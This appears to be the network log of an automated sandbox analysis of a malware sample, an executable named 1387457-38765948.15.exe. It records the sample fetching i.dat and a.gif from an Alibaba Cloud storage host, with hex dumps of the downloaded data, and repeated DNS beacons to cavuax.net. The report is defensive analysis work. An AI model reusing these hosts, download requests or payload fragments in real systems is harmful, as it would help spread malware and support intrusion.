Jan 12, 2025 04:12:10.371064901 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371082067 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371098042 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371118069 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371128082 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371154070 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371162891 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371193886 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371203899 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371227026 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371232033 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371252060 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371262074 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371294975 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371331930 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:10.371341944 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.371382952 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.372607946 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.420021057 CET	50017	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:10.420051098 CET	443	50017	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:15.109065056 CET	50019	8917	192.168.2.4	8.210.64.208
Jan 12, 2025 04:12:15.114048958 CET	8917	50019	8.210.64.208	192.168.2.4
Jan 12, 2025 04:12:15.114151001 CET	50019	8917	192.168.2.4	8.210.64.208
Jan 12, 2025 04:12:15.985589027 CET	50019	8917	192.168.2.4	8.210.64.208
Jan 12, 2025 04:12:15.990539074 CET	8917	50019	8.210.64.208	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 04:11:03.519946098 CET	55480	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:11:03.663203001 CET	53	55480	1.1.1.1	192.168.2.4
Jan 12, 2025 04:11:34.764064074 CET	55322	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:11:35.114622116 CET	53	55322	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:13.782737017 CET	49325	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:13.792150021 CET	53	49325	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:19.820039988 CET	64453	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:19.829384089 CET	53	64453	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:25.851047039 CET	59979	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:25.860305071 CET	53	59979	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:31.882688999 CET	63123	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:31.892870903 CET	53	63123	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:37.914237022 CET	60539	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:37.925014019 CET	53	60539	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:43.944935083 CET	56494	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:43.953929901 CET	53	56494	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:49.976419926 CET	53294	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:49.985472918 CET	53	53294	1.1.1.1	192.168.2.4
Jan 12, 2025 04:12:56.007384062 CET	56555	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:12:56.017622948 CET	53	56555	1.1.1.1	192.168.2.4
Jan 12, 2025 04:13:02.043821096 CET	58928	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:13:02.053170919 CET	53	58928	1.1.1.1	192.168.2.4
Jan 12, 2025 04:13:08.085911036 CET	51982	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:13:08.095810890 CET	53	51982	1.1.1.1	192.168.2.4
Jan 12, 2025 04:13:14.116837978 CET	52102	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:13:14.149523973 CET	53	52102	1.1.1.1	192.168.2.4
Jan 12, 2025 04:13:20.180519104 CET	60647	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:13:20.211345911 CET	53	60647	1.1.1.1	192.168.2.4
Jan 12, 2025 04:13:26.242275000 CET	53207	53	192.168.2.4	1.1.1.1
Jan 12, 2025 04:13:26.275190115 CET	53	53207	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 04:11:03.519946098 CET	192.168.2.4	1.1.1.1	0xb190	Standard query (0)	jcoiw1.oss-cn-shanghai.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:11:34.764064074 CET	192.168.2.4	1.1.1.1	0x828b	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:13.782737017 CET	192.168.2.4	1.1.1.1	0x195e	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:19.820039988 CET	192.168.2.4	1.1.1.1	0xc20a	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:25.851047039 CET	192.168.2.4	1.1.1.1	0x99ec	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:31.882688999 CET	192.168.2.4	1.1.1.1	0xdb68	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:37.914237022 CET	192.168.2.4	1.1.1.1	0xa4b0	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:43.944935083 CET	192.168.2.4	1.1.1.1	0x4460	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:49.976419926 CET	192.168.2.4	1.1.1.1	0x3207	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:56.007384062 CET	192.168.2.4	1.1.1.1	0x27f5	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:02.043821096 CET	192.168.2.4	1.1.1.1	0x9584	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:08.085911036 CET	192.168.2.4	1.1.1.1	0x69db	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:14.116837978 CET	192.168.2.4	1.1.1.1	0xd800	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:20.180519104 CET	192.168.2.4	1.1.1.1	0xf6b9	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:26.242275000 CET	192.168.2.4	1.1.1.1	0xdc27	Standard query (0)	cavuax.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 04:11:03.663203001 CET	1.1.1.1	192.168.2.4	0xb190	No error (0)	jcoiw1.oss-cn-shanghai.aliyuncs.com	sc-2wln.cn-shanghai.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 12, 2025 04:11:03.663203001 CET	1.1.1.1	192.168.2.4	0xb190	No error (0)	sc-2wln.cn-shanghai.oss-adns.aliyuncs.com	sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 12, 2025 04:11:03.663203001 CET	1.1.1.1	192.168.2.4	0xb190	No error (0)	sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com		47.101.26.25	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:11:35.114622116 CET	1.1.1.1	192.168.2.4	0x828b	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 12, 2025 04:11:35.114622116 CET	1.1.1.1	192.168.2.4	0x828b	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 12, 2025 04:11:35.114622116 CET	1.1.1.1	192.168.2.4	0x828b	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:13.792150021 CET	1.1.1.1	192.168.2.4	0x195e	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:19.829384089 CET	1.1.1.1	192.168.2.4	0xc20a	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:25.860305071 CET	1.1.1.1	192.168.2.4	0x99ec	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:31.892870903 CET	1.1.1.1	192.168.2.4	0xdb68	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:37.925014019 CET	1.1.1.1	192.168.2.4	0xa4b0	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:43.953929901 CET	1.1.1.1	192.168.2.4	0x4460	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:49.985472918 CET	1.1.1.1	192.168.2.4	0x3207	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:12:56.017622948 CET	1.1.1.1	192.168.2.4	0x27f5	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:02.053170919 CET	1.1.1.1	192.168.2.4	0x9584	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:08.095810890 CET	1.1.1.1	192.168.2.4	0x69db	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:14.149523973 CET	1.1.1.1	192.168.2.4	0xd800	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:20.211345911 CET	1.1.1.1	192.168.2.4	0xf6b9	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 04:13:26.275190115 CET	1.1.1.1	192.168.2.4	0xdc27	Name error (3)	cavuax.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jcoiw1.oss-cn-shanghai.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:05 UTC	107	OUT	GET /i.dat HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:05 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:05 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 678332C95C5A723034CAC1A1 Accept-Ranges: bytes ETag: "FF6D9354842B497B290F2E5509598F49" Last-Modified: Sat, 11 Jan 2025 10:54:12 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12504110949063718454 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: /22TVIQrSXspDy5VCVmPSQ== x-oss-server-time: 2
2025-01-12 03:11:05 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36 45 45 1b 55 3b 78 26 3d 5c 53 5a 55 34 3c 7b 34 58 5d 4d 41 2f 22 32 6f 0c 00 02 40 21 6e 27 29 4f 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 41 5d 5d 59 2a 63 76 76 1c 15 19 1f 68 2e 31 70 03 03 5d 13 7d 3e 60 7b 1a 15 1c 13 72 7a 3d 72 1e 1b 0b 07 69 64 74 29 4a 46 44 06 64 28 61 6f 09 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36 45 45 1b 55 3b 78 26 3d 5c 53 5a 55 34 3c 7b 34 58 5d 4d 41 2f 22 32 6f 0c 00 02 40 23 6e 27 29 4f 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 41 5d 5d 59 2a 63 76 76 1c 15 19 1f 68 2e 31 Data Ascii: l%00ZS_Y.hw6EEU;x&=\SZU4<{4X]MA/"2o@!n')O)))))))))))))))))))))))))))))))A]]Ycvvh.1p]}>`{rz=ridt)JFDd(aooooooooooooooooooooooooooooooool%00ZS_Y.hw6EEU;x&=\SZU4<{4X]MA/"2o@#n')O)))))))))))))))))))))))))))))))A]]Ycvvh.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:06 UTC	107	OUT	GET /a.gif HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:07 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:07 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 678332CBC3CC073138670B2B Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 1
2025-01-12 03:11:07 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87 Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92 Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea Data Ascii: c}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58 Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52 Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJLR
2025-01-12 03:11:07 UTC	4096	IN	Data Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19 Data Ascii: 